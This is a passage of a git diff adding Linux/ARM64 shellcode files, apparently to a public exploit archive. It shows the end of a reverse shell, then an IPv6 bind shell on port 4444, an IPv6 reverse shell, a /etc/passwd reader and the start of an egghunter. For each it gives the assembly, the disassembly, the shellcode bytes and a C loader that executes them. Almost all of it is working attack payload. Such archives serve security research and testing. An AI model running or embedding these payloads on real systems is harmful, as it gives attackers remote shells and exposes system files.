+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o revshell.o revshell.s && ld -o revshell revshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./revshell
+
+./revshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40007c:	d347fd01 	lsr	x1, x8, #7
+  400080:	d37ff820 	lsl	x0, x1, #1
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d40266e1 	svc	#0x1337
+  40008c:	aa2003e4 	mvn	x4, x0
+  400090:	d37ff821 	lsl	x1, x1, #1
+  400094:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  400098:	f2c00fe1 	movk	x1, #0x7f, lsl #32
+  40009c:	f2e02001 	movk	x1, #0x100, lsl #48
+  4000a0:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000a4:	8b2263e1 	add	x1, sp, x2
+  4000a8:	d2800202 	mov	x2, #0x10                  	// #16
+  4000ac:	d2801968 	mov	x8, #0xcb                  	// #203
+  4000b0:	d40266e1 	svc	#0x1337
+  4000b4:	d342fc41 	lsr	x1, x2, #2
+
+00000000004000b8 <dup3>:
+  4000b8:	aa2403e0 	mvn	x0, x4
+  4000bc:	d341fc21 	lsr	x1, x1, #1
+  4000c0:	aa1f03e2 	mov	x2, xzr
+  4000c4:	d2800308 	mov	x8, #0x18                  	// #24
+  4000c8:	d40266e1 	svc	#0x1337
+  4000cc:	aa1f03ea 	mov	x10, xzr
+  4000d0:	eb01015f 	cmp	x10, x1
+  4000d4:	54ffff21 	b.ne	4000b8 <dup3>
+  4000d8:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  4000dc:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  4000e0:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  4000e4:	f2e00d03 	movk	x3, #0x68, lsl #48
+  4000e8:	f81f8fe3 	str	x3, [sp,#-8]!
+  4000ec:	8b2163e0 	add	x0, sp, x1
+  4000f0:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  4000f4:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary revshell revshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' revshell.bin && echo
+\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2\xe1\x0f\xc0\xf2\x01\x20\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x02\x02\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\x41\xfc\x42\xd3\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x18\x80\xd2\x01\xfd\x47\xd3\x20\xf8\x7f\xd3\xe2\x03\x1f\xaa"
+"\xe1\x66\x02\xd4\xe4\x03\x20\xaa\x21\xf8\x7f\xd3\x21\x82\xab\xf2"
+"\xe1\x0f\xc0\xf2\x01\x20\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b"
+"\x02\x02\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\x41\xfc\x42\xd3"
+"\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2"
+"\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54"
+"\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2"
+"\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47051.c b/shellcodes/arm/47051.c
new file mode 100644
index 000000000..ac88743d7
--- /dev/null
+++ b/shellcodes/arm/47051.c
@@ -0,0 +1,181 @@
+/*
+# Title:  Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat ipv6bindshell.s
+.section .text
+.global _start
+_start:
+    // socket(10, 1, 0)
+    mov  x0, #0x0a
+    lsr  x1, x0, #3
+    lsl  x3, x1, #2
+    mov  x2, xzr
+    mov  x8, #198
+    svc  #0x1337
+
+    // save fd
+    mvn  x4, x0
+
+    // bind(fd, &sockaddr, 28)
+    str  xzr, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    movz x1, #0x0a
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #28
+    mov  x8, #200
+    svc  #0x1337
+
+    // listen(s, 2)
+    mvn  x0, x4
+    mov  x1, x3
+    mov  x8, #201
+    svc  #0x1337
+
+    // a = accept(s, 0, 0)
+    mvn  x0, x4
+    mov  x1, xzr
+    mov  x2, xzr
+    mov  x8, #202
+    svc  #0x1337
+
+    // save a
+    mvn  x4, x0
+
+    mov  x1, x3
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o ipv6bindshell.o ipv6bindshell.s && ld -o ipv6bindshell ipv6bindshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./ipv6bindshell
+
+./ipv6bindshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2800140 	mov	x0, #0xa                   	// #10
+  40007c:	d343fc01 	lsr	x1, x0, #3
+  400080:	d37ef423 	lsl	x3, x1, #2
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40008c:	d40266e1 	svc	#0x1337
+  400090:	aa2003e4 	mvn	x4, x0
+  400094:	f81f8fff 	str	xzr, [sp,#-8]!
+  400098:	f81f8fff 	str	xzr, [sp,#-8]!
+  40009c:	f81f8fff 	str	xzr, [sp,#-8]!
+  4000a0:	d2800141 	mov	x1, #0xa                   	// #10
+  4000a4:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  4000a8:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000ac:	8b2263e1 	add	x1, sp, x2
+  4000b0:	d2800382 	mov	x2, #0x1c                  	// #28
+  4000b4:	d2801908 	mov	x8, #0xc8                  	// #200
+  4000b8:	d40266e1 	svc	#0x1337
+  4000bc:	aa2403e0 	mvn	x0, x4
+  4000c0:	aa0303e1 	mov	x1, x3
+  4000c4:	d2801928 	mov	x8, #0xc9                  	// #201
+  4000c8:	d40266e1 	svc	#0x1337
+  4000cc:	aa2403e0 	mvn	x0, x4
+  4000d0:	aa1f03e1 	mov	x1, xzr
+  4000d4:	aa1f03e2 	mov	x2, xzr
+  4000d8:	d2801948 	mov	x8, #0xca                  	// #202
+  4000dc:	d40266e1 	svc	#0x1337
+  4000e0:	aa2003e4 	mvn	x4, x0
+  4000e4:	aa0303e1 	mov	x1, x3
+
+00000000004000e8 <dup3>:
+  4000e8:	aa2403e0 	mvn	x0, x4
+  4000ec:	d341fc21 	lsr	x1, x1, #1
+  4000f0:	aa1f03e2 	mov	x2, xzr
+  4000f4:	d2800308 	mov	x8, #0x18                  	// #24
+  4000f8:	d40266e1 	svc	#0x1337
+  4000fc:	aa1f03ea 	mov	x10, xzr
+  400100:	eb01015f 	cmp	x10, x1
+  400104:	54ffff21 	b.ne	4000e8 <dup3>
+  400108:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  40010c:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  400110:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  400114:	f2e00d03 	movk	x3, #0x68, lsl #48
+  400118:	f81f8fe3 	str	x3, [sp,#-8]!
+  40011c:	8b2163e0 	add	x0, sp, x1
+  400120:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400124:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary ipv6bindshell ipv6bindshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ipv6bindshell.bin && echo
+\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa"
+"\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8"
+"\xff\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x08\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x03\xaa\x28\x19\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x24\xaa\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa"
+"\x48\x19\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xe1\x03\x03\xaa"
+"\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2"
+"\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54"
+"\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2"
+"\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47052.c b/shellcodes/arm/47052.c
new file mode 100644
index 000000000..660fba95d
--- /dev/null
+++ b/shellcodes/arm/47052.c
@@ -0,0 +1,155 @@
+/*
+# Title:  Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat ipv6revshell.s
+.section .text
+.global _start
+_start:
+    // socket(10, 1, 0)
+    mov  x0, #0x0a
+    lsr  x1, x0, #3
+    lsl  x3, x1, #2
+    mov  x2, xzr
+    mov  x8, #198
+    svc  #0x1337
+
+    // save fd
+    mvn  x4, x0
+
+    // connect(fd, &sockaddr, 28)
+    str  xzr, [sp, #-8]!
+    mov  x1, #0x0100000000000000
+    str  x1, [sp, #-8]!
+    str  xzr, [sp, #-8]!
+    movz x1, #0x0A
+    movk x1, #0x5C11, lsl #16
+    str  x1, [sp, #-8]!
+    add  x1, sp, x2
+    mov  x2, #28
+    mov  x8, #203
+    svc  #0x1337
+
+    mov  x1, x3
+
+dup3:
+    // dup3(s, 2, 0)
+    // dup3(s, 1, 0)
+    // dup3(s, 0, 0)
+    mvn  x0, x4
+    lsr  x1, x1, #1
+    mov  x2, xzr
+    mov  x8, #24
+    svc  #0x1337
+    mov  x10, xzr
+    cmp  x10, x1
+    bne  dup3
+
+    // execve("/bin/sh", 0, 0)
+    mov  x3, #0x622F
+    movk x3, #0x6E69, lsl #16
+    movk x3, #0x732F, lsl #32
+    movk x3, #0x68, lsl #48
+    str  x3, [sp, #-8]!
+    add  x0, sp, x1
+    mov  x8, #221
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o ipv6revshell.o ipv6revshell.s && ld -o ipv6revshell ipv6revshell.o
+ubuntu@ubuntu:~/works$ objdump -d ./ipv6revshell
+
+./ipv6revshell:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2800140 	mov	x0, #0xa                   	// #10
+  40007c:	d343fc01 	lsr	x1, x0, #3
+  400080:	d37ef423 	lsl	x3, x1, #2
+  400084:	aa1f03e2 	mov	x2, xzr
+  400088:	d28018c8 	mov	x8, #0xc6                  	// #198
+  40008c:	d40266e1 	svc	#0x1337
+  400090:	aa2003e4 	mvn	x4, x0
+  400094:	f81f8fff 	str	xzr, [sp,#-8]!
+  400098:	d2e02001 	mov	x1, #0x100000000000000     	// #72057594037927936
+  40009c:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000a0:	f81f8fff 	str	xzr, [sp,#-8]!
+  4000a4:	d2800141 	mov	x1, #0xa                   	// #10
+  4000a8:	f2ab8221 	movk	x1, #0x5c11, lsl #16
+  4000ac:	f81f8fe1 	str	x1, [sp,#-8]!
+  4000b0:	8b2263e1 	add	x1, sp, x2
+  4000b4:	d2800382 	mov	x2, #0x1c                  	// #28
+  4000b8:	d2801968 	mov	x8, #0xcb                  	// #203
+  4000bc:	d40266e1 	svc	#0x1337
+  4000c0:	aa0303e1 	mov	x1, x3
+
+00000000004000c4 <dup3>:
+  4000c4:	aa2403e0 	mvn	x0, x4
+  4000c8:	d341fc21 	lsr	x1, x1, #1
+  4000cc:	aa1f03e2 	mov	x2, xzr
+  4000d0:	d2800308 	mov	x8, #0x18                  	// #24
+  4000d4:	d40266e1 	svc	#0x1337
+  4000d8:	aa1f03ea 	mov	x10, xzr
+  4000dc:	eb01015f 	cmp	x10, x1
+  4000e0:	54ffff21 	b.ne	4000c4 <dup3>
+  4000e4:	d28c45e3 	mov	x3, #0x622f                	// #25135
+  4000e8:	f2adcd23 	movk	x3, #0x6e69, lsl #16
+  4000ec:	f2ce65e3 	movk	x3, #0x732f, lsl #32
+  4000f0:	f2e00d03 	movk	x3, #0x68, lsl #48
+  4000f4:	f81f8fe3 	str	x3, [sp,#-8]!
+  4000f8:	8b2163e0 	add	x0, sp, x1
+  4000fc:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  400100:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary ipv6revshell ipv6revshell.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' ipv6revshell.bin && echo
+\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8\x01\x20\xe0\xd2\xe1\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2\x68\x19\x80\xd2\xe1\x66\x02\xd4\xe1\x03\x03\xaa\xe0\x03\x24\xaa\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\x40\x01\x80\xd2\x01\xfc\x43\xd3\x23\xf4\x7e\xd3\xe2\x03\x1f\xaa"
+"\xc8\x18\x80\xd2\xe1\x66\x02\xd4\xe4\x03\x20\xaa\xff\x8f\x1f\xf8"
+"\x01\x20\xe0\xd2\xe1\x8f\x1f\xf8\xff\x8f\x1f\xf8\x41\x01\x80\xd2"
+"\x21\x82\xab\xf2\xe1\x8f\x1f\xf8\xe1\x63\x22\x8b\x82\x03\x80\xd2"
+"\x68\x19\x80\xd2\xe1\x66\x02\xd4\xe1\x03\x03\xaa\xe0\x03\x24\xaa"
+"\x21\xfc\x41\xd3\xe2\x03\x1f\xaa\x08\x03\x80\xd2\xe1\x66\x02\xd4"
+"\xea\x03\x1f\xaa\x5f\x01\x01\xeb\x21\xff\xff\x54\xe3\x45\x8c\xd2"
+"\x23\xcd\xad\xf2\xe3\x65\xce\xf2\x03\x0d\xe0\xf2\xe3\x8f\x1f\xf8"
+"\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47053.c b/shellcodes/arm/47053.c
new file mode 100644
index 000000000..38742e698
--- /dev/null
+++ b/shellcodes/arm/47053.c
@@ -0,0 +1,139 @@
+/*
+# Title:  Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat passwd.s
+.section .text
+.global _start
+_start:
+    // fd = openat(0, "/etc/passwd", O_RDONLY)
+    mov  x0, xzr
+    mov  x1, #0x7773
+    movk x1, #0x64, lsl #16
+    str  x1, [sp, #-8]!
+    mov  x1, #0x652f
+    movk x1, #0x6374, lsl #16
+    movk x1, #0x702f, lsl #32
+    movk x1, #0x7361, lsl #48
+    str  x1, [sp, #-8]!
+    add  x1, sp, x0
+    mov  x2, xzr
+    mov  x8, #56
+    svc  #0x1337
+
+    mvn  x3, x0
+
+    // read(fd, *buf, size)
+    mov  x2, #0xfff
+    sub  sp, sp, x2
+    mov  x8, xzr
+    add  x1, sp, x8
+    mov  x8, #63
+    svc  #0x1337
+
+    // write(1, *buf, size)
+    str  x0, [sp, #-8]!
+    lsr  x0, x2, #11
+    ldr  x2, [sp], #8
+    mov  x8, #64
+    svc  #0x1337
+
+    // status = close(fd)
+    mvn  x0, x3
+    mov  x8, #57
+    svc  #0x1337
+
+    // exit(status)
+    mov  x8, #93
+    svc  #0x1337
+ubuntu@ubuntu:~/works$ as -o passwd.o passwd.s && ld -o passwd passwd.o
+ubuntu@ubuntu:~/works$ objdump -d ./passwd
+
+./passwd:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	aa1f03e0 	mov	x0, xzr
+  40007c:	d28eee61 	mov	x1, #0x7773                	// #30579
+  400080:	f2a00c81 	movk	x1, #0x64, lsl #16
+  400084:	f81f8fe1 	str	x1, [sp,#-8]!
+  400088:	d28ca5e1 	mov	x1, #0x652f                	// #25903
+  40008c:	f2ac6e81 	movk	x1, #0x6374, lsl #16
+  400090:	f2ce05e1 	movk	x1, #0x702f, lsl #32
+  400094:	f2ee6c21 	movk	x1, #0x7361, lsl #48
+  400098:	f81f8fe1 	str	x1, [sp,#-8]!
+  40009c:	8b2063e1 	add	x1, sp, x0
+  4000a0:	aa1f03e2 	mov	x2, xzr
+  4000a4:	d2800708 	mov	x8, #0x38                  	// #56
+  4000a8:	d40266e1 	svc	#0x1337
+  4000ac:	aa2003e3 	mvn	x3, x0
+  4000b0:	d281ffe2 	mov	x2, #0xfff                 	// #4095
+  4000b4:	cb2263ff 	sub	sp, sp, x2
+  4000b8:	aa1f03e8 	mov	x8, xzr
+  4000bc:	8b2863e1 	add	x1, sp, x8
+  4000c0:	d28007e8 	mov	x8, #0x3f                  	// #63
+  4000c4:	d40266e1 	svc	#0x1337
+  4000c8:	f81f8fe0 	str	x0, [sp,#-8]!
+  4000cc:	d34bfc40 	lsr	x0, x2, #11
+  4000d0:	f84087e2 	ldr	x2, [sp],#8
+  4000d4:	d2800808 	mov	x8, #0x40                  	// #64
+  4000d8:	d40266e1 	svc	#0x1337
+  4000dc:	aa2303e0 	mvn	x0, x3
+  4000e0:	d2800728 	mov	x8, #0x39                  	// #57
+  4000e4:	d40266e1 	svc	#0x1337
+  4000e8:	d2800ba8 	mov	x8, #0x5d                  	// #93
+  4000ec:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary passwd passwd.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' passwd.bin && echo
+\xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4\xa8\x0b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe0\x03\x1f\xaa\x61\xee\x8e\xd2\x81\x0c\xa0\xf2\xe1\x8f\x1f\xf8"
+"\xe1\xa5\x8c\xd2\x81\x6e\xac\xf2\xe1\x05\xce\xf2\x21\x6c\xee\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x63\x20\x8b\xe2\x03\x1f\xaa\x08\x07\x80\xd2"
+"\xe1\x66\x02\xd4\xe3\x03\x20\xaa\xe2\xff\x81\xd2\xff\x63\x22\xcb"
+"\xe8\x03\x1f\xaa\xe1\x63\x28\x8b\xe8\x07\x80\xd2\xe1\x66\x02\xd4"
+"\xe0\x8f\x1f\xf8\x40\xfc\x4b\xd3\xe2\x87\x40\xf8\x08\x08\x80\xd2"
+"\xe1\x66\x02\xd4\xe0\x03\x23\xaa\x28\x07\x80\xd2\xe1\x66\x02\xd4"
+"\xa8\x0b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/arm/47054.c b/shellcodes/arm/47054.c
new file mode 100644
index 000000000..4bef97307
--- /dev/null
+++ b/shellcodes/arm/47054.c
@@ -0,0 +1,146 @@
+/*
+# Title:  Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcode (88 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat egghunter.s
+.section .text
+.global _start
+
+_start:
+    mov  x8, #226               // Systemcall Number = x8 = 226 (mprotect)
+    lsr  x2, x8, #5             // args[2] = x2 = 7 = PROT_READ|PROT_WRITE|PROT_EXEC
+    add  x1, x2, #0xff9         // args[1] = x1 = 0x1000
+    mov  x10, xzr               // Start address of scannning = x10 = 0x0000000000000000
+    mov  x11, #0x5750           // Eggtag = x11 = 0x0000000000005750
+    movk x11, #0x214E, lsl #16  // Eggtag = x11 = 0x00000000214E5750
+    add  x11, x11, x11, lsl #32 // Eggtag = x11 = 0x214E5750214E5750 = "!NWP!NWP"
+jump_search_page:
+    tbz  x8, #63, search_page   // In this code, the top bit of x8 register is always zero. Jump to address of search_page
+
+jump_shellcode:
+    br   x10                    // Jump to shellcode
+
+hunt:
+    add  x13, x10, x1           // End address of current page = x13
+next_address:
+    ldr  x12, [x10], #8         // Load value from the address pointed by x10 to x12 and add 8 to x10
+    cmp  x11, x12               // Compare loaded value and eggtag.
+    beq  jump_shellcode         // If loaded value matched to eggtag, jump to the address of jump_shellcode part.
+    cmp  x10, x13               // Check if current searching address (x10) over end address of current page (x13).
